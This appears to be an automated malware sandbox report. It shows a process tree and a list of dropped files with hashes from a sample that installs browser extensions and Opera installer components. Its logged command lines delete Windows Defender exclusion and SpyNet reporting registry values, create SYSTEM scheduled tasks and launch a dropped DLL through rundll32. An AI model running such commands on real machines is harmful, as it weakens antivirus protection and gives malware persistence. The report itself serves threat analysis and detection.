                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                    PID:2208
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                    cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                      PID:1804
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "bvgvHgqNgKCzXIKVFa"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                      PID:2188
                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                      schtasks /DELETE /F /TN "rzGcUtIiGGHHJZZ"
                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                        PID:2372
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                        schtasks /END /TN "rzGcUtIiGGHHJZZ"
                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                          PID:2132
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "znkJCAEyDBfVBb" /F /xml "C:\Program Files (x86)\hzVOasbgcFlU2\icpqVAj.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:3316
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "sqdcfvEhbfSqC2" /F /xml "C:\ProgramData\cAagwmwWSSyWmtVB\frhoinv.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:1200
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "rzGcUtIiGGHHJZZ2" /F /xml "C:\Program Files (x86)\AplGwAcKU\YaltxYw.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:956
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "kIZjYIiOiOcCcskeG2" /F /xml "C:\Program Files (x86)\KpccCTQHFwdaQGGjlLR\SVLJRNq.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:5028
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "hLfWoLfTBNTItANDgYs2" /F /xml "C:\Program Files (x86)\TewsSzADpkOsC\jUNosru.xml" /RU "SYSTEM"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:3208
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /CREATE /TN "dHRDOHpkQTLgzSbMl" /SC once /ST 17:17:34 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\tisqMnSmFJrmHkYA\ERJvieDP\VdSrngX.dll\",#1 /xNsite_idetk 385118" /V1 /F
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                          PID:1360
                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                          schtasks /run /I /tn "dHRDOHpkQTLgzSbMl"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:784
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                            schtasks /DELETE /F /TN "XwMyCejzLOqQPkTJD"
                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                              PID:2296
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                              cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                PID:828
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                  PID:1636
                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:5096
                                                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                    PID:1412
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\system32\rundll32.EXE
                                                                                                                                                                                                                                                                                                                                    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tisqMnSmFJrmHkYA\ERJvieDP\VdSrngX.dll",#1 /xNsite_idetk 385118
                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                      PID:4076
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\tisqMnSmFJrmHkYA\ERJvieDP\VdSrngX.dll",#1 /xNsite_idetk 385118
                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                                                                                                        PID:3600
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          schtasks /DELETE /F /TN "dHRDOHpkQTLgzSbMl"
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:1124
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                                        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                          PID:1432
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3372 -ip 3372
                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                            PID:2468

                                                                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            208KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            becbdd680b6250d75113a24ac3ae4129

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            4152388f0b793441ab64f1038666c7bdb2b63858

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            6dfb6a6d1bb772e5d8b0410eb8f2eafad21c1e4f5701b9f86af1bafafb892f11

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            52ca3ec19812f4cb6e6662addb9d2d19267585114c5c1bcd41aa4efc14394cc698cbd5bd66f5bfcd3a6aaf06a95dc7ab13dd6d6cd3ef1aa8c12345485690f514

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            187B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            136B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            150B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            10KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            33bf3bc79af06b06df3148dfdf0cea86

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            38033ccd99ca9448effa8510b4568aafa0360072

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            bddb73ec81cf859855a3df3658d60cdaaaf302e261e99a6b9826d357ce2d9708

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5734031942861b3b70d69e137eb5a536528b45a0451cf580565d0d9a41bbcecba3ccdff57578ac2c3e5f3cb9f003ddbd739386c97bc89846f3e59c860b876a35

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            35KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            5efc5b70712d2dd92fffbfc13c06b1b5

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            5104375212d7971a62cd29a28687ff9b17ce15cc

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            74c2dd0ec00dd9e2f14d67f86ef989bf7fb4f4766a8359184738227dbc49033d

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            d5d021402de3d57ecaeed99adeb7081bec9aa8d96d906b637fc56b00af418359d9d2b435f46fc26ec4b334a11cfe7ba4e1031a8d6a4f8540b00f44868dffe12b

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            88dc70c361a22feac57b031dd9c1f02f

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            a9b4732260c2a323750022a73480f229ce25d46d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            2KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            d0c46cad6c0778401e21910bd6b56b70

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            7be418951ea96326aca445b8dfe449b2bfa0dca6

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            151B

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            bd6b60b18aee6aaeb83b35c68fb48d88

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            9b977a5fbf606d1104894e025e51ac28b56137c3

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            077d9dd77b42051bd002be3a752357d6

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            a024523004f34b26b2a97b6f9645dc58a6c587e0

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            da4cd805bc6a7602f346a65dd2c83406363fb2f430b61d29227a2624b1b0ac4c

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            b3abd2aac2375d69b511b1c18e6c08b091db2816c0565512f5b11bd38899b117b5f2881cfd12a3c07570c200ca4530fd4e153c85a85420b4f4c6211d298132fc

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            20KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            a776cda7f6d710bc4246fd4b4c60af4a

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            42ccf0983d96fe8d90c32985027bea06c13230b1

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d8a5b19658e77b2af9e93c8c499a8094da9d8c747b7e4a9494718f6fa4072ffa

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            ab3aa62087bded7bb7f37dea4f9fd83dccb823e1b4c425c38fadbb85cd63097e5ed4c2ce98faaf9fc7061e5b40e7e7c63594aedbc0376ef0e8e13ccef04f6160

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            9KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            04f8529c003a83a4ede8daecdd9db16c

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            02890c200f329437fd097de3e261db000c5c5a9c

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            fa480fe0bd4f44d3462c791c262db88b4895710cfac61d10cc490569a7037341

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            f628d47bff93785f6d590310d3f5fc4db423814ef5932b4089cb07743aa37fce88c8240faa512b84d17426483446a7061a3d7ff7ccab882fa7bf8812f91d5973

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\kKvpKmnMp4fgI8GluXYHvgrz.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            34KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            2a8afd768e0940912caa20ea07a01325

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            45731ba46a599c81c448bf9da9067ebf88c8b0df

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            91d786bf3623bbfc6f115e62a7429d63469d5ab6be2d76ead3b10c67a4bc33c5

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            1332e9a2949716bf0bbcdbd398768f12678d4d5b5346c1ca75d45ac7fa06b3fb6b000e5f07872269b0b4b0d1053c8a593c67e76a4db1dd969870c6492d9ccda9

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\additional_file0.tmp

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            7KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            01cae3e84a3508b4ed2b3da45bf7c40d

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            5bf537ea487f776c1e3d57516fe4e035cd169a90

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            d016f20b6597b75a2e5888928a8b2074b04224415e1056c5f617a6059820ade3

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            47a33739f5cdf30230adcf7bec57e395cd9df806eebfb87c87f697a26794bae899b673d42a82a3fe76eec9d8e240aca6fb184f6081f3bcd420dbde9b1c3c0ad5

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            f6a81c8ec225bdd1a70b745cd80a47bb

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            9ad828d3163c062359628a93f0c6dfba5476109c

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            00acc68f68df7a3c2285a4933dacb898b2fbbc8cf9cb498eca7da4276a1b73b7

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            749554917d2661295b4417e645c8a7d7a27b870cbfa77df510a0fc48641e45e183392ea0a26839dfcf5242b4ed5cdb70b6d76bfbffa92d8f9041202de5f08ddd

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            57KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            e87e12a06267a2aa9e6af13d202be37b

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            3d3ea876e09a5756d544933ea7871e3303a2323e

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            cc2613a3f9a8fcf015fe3fa504f67c3e08a20d9250db92e98912da5336562352

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            6914c66da99476d39a8feb8bf594fd6327ae3d101652e70dbc1a8feaf940b5106286a09f3f4b7ee2812a48af604c36985bbf0e323f3a609e5e9ed62c1b681eba

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            75KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            14a2600ea05936097240d3bccba71876

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            5172f2f7baf7bfadbc457fb8cf59701322ccc7a4

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            7c86caa2612e9c7e24a773ecefa05e755f96a0e4c5689e6c3b8a5319c490138e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            a5a2cadd26c2b6a0995c1cfaed011e85b182e6354b57b55a979528d069ed412deddd2100aeb7e78b10a35fecfb8d09d4d0b8747ec8fee3ccaaa733291004cd91

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\assistant_installer.exe

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            34KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            f7a12f5592b274fdffd0d2d978a9f8d9

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            e8c22eea4e2e729cc04a426775e51285cf8c9a3b

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            42c367bcfc6310bcb106f2ce1f9a86f7f0e6e080b464f3456d70bf41851e042e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            8d40c040d40b7f531fdf7360d4bdc8b310eaa7d3a9ec0677fc757cfe00af8985b1cd98f7fbcd8769703608e281ae9a6aae86ee22ee8c2fd1c123bbb07173df36

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbgcore.DLL

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            21KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            8837d32894e8d6b8d0d9d17f18d359c7

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            601926789190fece5d4378b92ea9d4fa6089c03d

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            0d3982994cc71ee8352208d41a69fe16df167b6691545e095288c73f4b3eb47e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            0b9d91bd8820166be9012aa729e0ba55fb57c58ed95ab67b37c576fae095f5808ea455c3396f8182c2b7b1b00d3e0a9695cdaea56acc05fc9cb468dd0ca33a3f

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbgcore.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            47KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            813c226a431b2e346b93abb8765abaec

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            41119d6d38b3a4e8b82432bddfcc8053a31f1250

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            71fdce88c286585484bca2f42c1a2c4b61d9ac992c20dac9b341f4a26e9a2b46

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            5958cb7fce7a58963037cdbd34ea89ba63c414c255353d482fb10802995be51b349881a901acbb40a8de80f4fe26d2a474482a5313f07ca188aac5983911c2f0

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbgcore.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            59KB

                                                                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                                                                            c92128949fbd24a78507982e1c58837e

                                                                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                                                                            c22ece3797d942323c983d6f154355bbc3068707

                                                                                                                                                                                                                                                                                                                                            SHA256

                                                                                                                                                                                                                                                                                                                                            7780f52fa9cc65cf9ceb114aff7d19629139739d78faa770a7fbff4072b3694e

                                                                                                                                                                                                                                                                                                                                            SHA512

                                                                                                                                                                                                                                                                                                                                            a823fe8a31c17f033fa94b14e01ce402dcb1719e727fedb5048f5def35355dbfaace66264b690dc7f4ce0a401f87d443f612cdf2736c679268a7abd697ee3c59

                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042051131\assistant\dbghelp.dll

                                                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                                                            57KB

                                                                                                                                                                                                                                                                                                                                            MD5
